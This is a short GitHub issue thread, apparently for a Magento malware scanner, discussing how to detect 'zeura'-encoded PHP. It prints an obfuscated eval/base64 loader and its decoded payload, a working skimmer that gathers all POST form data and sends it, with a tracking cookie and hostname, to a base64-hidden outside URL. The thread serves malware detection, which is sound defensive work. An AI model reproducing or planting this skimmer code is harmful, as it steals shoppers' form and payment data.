gwillem
commented
6 years ago Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura" encrypted files. Perhaps, we should flag the existence of "zeura" in specific Magento files. Then, we would have to rewrite the scanner to pass the filename as attribute to the scan function. See also https://github.com/VirusTotal/yara/issues/202
I found this line manually after deep mwsan
<?php/ PHP Encode v1.0 by zeura.com / $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`when I decrypt Zeura I get the folllowing code at the end of the file
if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>